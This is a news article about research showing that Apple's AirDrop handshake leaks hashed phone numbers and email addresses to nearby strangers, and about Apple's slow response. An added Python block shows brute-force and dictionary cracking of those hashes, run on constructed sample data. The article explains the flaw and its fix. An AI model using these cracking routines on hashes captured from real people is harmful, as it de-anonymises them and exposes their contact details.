Apple AirDrop Flaws Could Let Hackers Grab Users' Phone Numbers and Email Addresses

Graham CLULEY

April 23, 2021

Users of Apple products have long loved the ability to share files wirelessly with each other, using AirDrop to transmit files between their iPhones and MacBooks.

But researchers at the Technical University of Darmstadt in Germany have discovered that weaknesses in AirDrop's authentication handshake could allow an attacker to obtain a victim's phone number and even email address.

And you know what's worse? Apple has not fixed the problem almost two years after being told about it, despite 1.5 billion devices worldwide being potentially vulnerable.

The researchers’ paper, entitled “PrivateDrop: Practical Privacy-Preserving Authentication for Apple AirDrop”, details what it describes as “two severe privacy vulnerabilities in the underlying authentication protocol” used by AirDrop.

According to the paper, the problem lies in how AirDrop determines if a nearby device belongs to somebody the user already knows.

To discover whether two devices belong to mutual contacts, AirDrop's handshake transmits SHA-256 hashes of the sending user's contact identifiers (email address and phone number) rather than the identifiers themselves. Every device in the vicinity sees those hashes and compares them against hashed entries in its own address book; if the sender turns out to be a known contact, the receiver replies with hashes of its own identifiers. The hashes are therefore disclosed to any nearby device before either side has established that the other is actually a contact.

An attacker can brute-force the hash to recover the phone number offline. Because the space of valid phone numbers is small enough to enumerate completely, this takes just seconds.

Email addresses are harder to reverse, but the researchers believe attackers could have some success with dictionary attacks built from common email formats (such as firstname.lastname@gmail.com, yahoo.com, and so forth). In addition, the hashes can be matched against email addresses already exposed in past data breaches.
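The following Python model illustrates both halves of the problem described above: the hash-only contact check, and the offline brute-force and dictionary attacks on the hashes it leaks. It is an added example written for this article, not Apple's code or the researchers' PrivateDrop code. It assumes, for illustration, that identifiers are hashed as plain UTF-8 strings after the caller normalises them (phone numbers in +-prefixed international form, email addresses lower-cased); the real handshake carries the hashes inside a larger authentication exchange that is not modelled here. The phone brute-force is narrowed to a known prefix so it finishes in a fraction of a second; a full national numbering plan is the same loop with more unknown digits, which is why the attack is a matter of seconds on commodity hardware. All address-book entries, names and domains below are constructed sample data.

```python
"""Toy model of AirDrop-style hashed contact discovery and the offline attacks on it.

Added example for illustration only; not Apple's implementation and not PrivateDrop.
"""
import hashlib
import itertools
import string
import time


def identifier_hash(identifier: str) -> str:
    """SHA-256 hex digest of one contact identifier.

    Assumption (not taken from Apple's code): the identifier is hashed exactly as
    given, so callers normalise first (+-prefixed phone numbers, lower-case emails).
    """
    return hashlib.sha256(identifier.encode("utf-8")).hexdigest()


def sender_hello(identifiers):
    """What the sending device broadcasts: hashes only, never the raw identifiers."""
    return [identifier_hash(i) for i in identifiers]


def receiver_check(received_hashes, address_book, own_identifiers):
    """Receiver side of the handshake.

    Hash every identifier in the local address book and look for an overlap with
    what the sender announced. Only on a match does the receiver answer with its
    own hashes; otherwise it stays silent. Either way it has already learned the
    sender's hashes, which is the privacy leak.
    """
    known = {identifier_hash(entry) for entry in address_book}
    if any(h in known for h in received_hashes):
        return sender_hello(own_identifiers)
    return None


def brute_force_phone(target_hash, known_prefix, unknown_digits):
    """Recover a phone number from its hash by enumerating every digit suffix.

    The search space is 10**unknown_digits candidates; a whole country's numbering
    plan is just a larger value of unknown_digits, not a different technique.
    """
    for digits in itertools.product(string.digits, repeat=unknown_digits):
        candidate = known_prefix + "".join(digits)
        if identifier_hash(candidate) == target_hash:
            return candidate
    return None


# Common mailbox naming patterns used for the dictionary attack (constructed list).
EMAIL_FORMATS = (
    "{first}.{last}@{domain}",
    "{first}{last}@{domain}",
    "{first}_{last}@{domain}",
    "{f}{last}@{domain}",
    "{first}@{domain}",
)


def dictionary_email(target_hash, names, domains, formats=EMAIL_FORMATS):
    """Recover an email address by hashing name/domain/format combinations.

    `names` is a list of (first, last) pairs, e.g. from a breach dump or a
    company staff page; `domains` is a list of popular mail providers.
    """
    for (first, last), domain, fmt in itertools.product(names, domains, formats):
        candidate = fmt.format(first=first, last=last, f=first[0], domain=domain).lower()
        if identifier_hash(candidate) == target_hash:
            return candidate
    return None


# Constructed sample data: the victim's identifiers and an attacker's wordlists.
ALICE_PHONE = "+15550129876"
ALICE_EMAIL = "alice.lee@gmail.com"
NAMES = [("alice", "lee"), ("bob", "chen"), ("carol", "kim")]
DOMAINS = ["gmail.com", "yahoo.com", "icloud.com"]


def demo():
    """Run the handshake with a stranger as receiver, then attack the leaked hashes."""
    leaked = sender_hello([ALICE_PHONE, ALICE_EMAIL])
    # The attacker's device has an empty address book: the handshake produces no
    # match and no reply, yet the attacker still holds Alice's hashes.
    reply = receiver_check(leaked, address_book=[], own_identifiers=[])
    start = time.perf_counter()
    phone = brute_force_phone(leaked[0], known_prefix="+155501", unknown_digits=5)
    email = dictionary_email(leaked[1], NAMES, DOMAINS)
    elapsed = time.perf_counter() - start
    return {"reply_to_stranger": reply, "phone": phone, "email": email, "seconds": elapsed}


if __name__ == "__main__":
    print(demo())
```

Running the block prints the recovered phone number and email address after trying at most 100,000 phone candidates and 45 email candidates. Note that hashing a phone number does nothing to protect it: a hash is only as secret as its preimage is hard to guess, and the preimage space here is tiny.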

Responsibly, the researchers disclosed the flaw to Apple privately in May 2019, hoping that it would be fixed. Apple responded in July 2020, saying that it did "not have any updates on new features or any changes to mitigate the underlying issue."

It's worth remembering that for an attack to be successful, a malicious party would need to be in close physical proximity to their victims, within wireless range of the AirDrop handshake. And yes, there are probably easier ways to determine someone's phone number than this route, but that's no reason not to harden AirDrop.

Perhaps frustrated by Apple's response, the research team developed its own proof-of-concept replacement for AirDrop's flawed contact check, which they called "PrivateDrop." However, the researchers admit that the only practical way for it to be used in place of AirDrop is if Apple itself integrates it into its devices' operating systems.
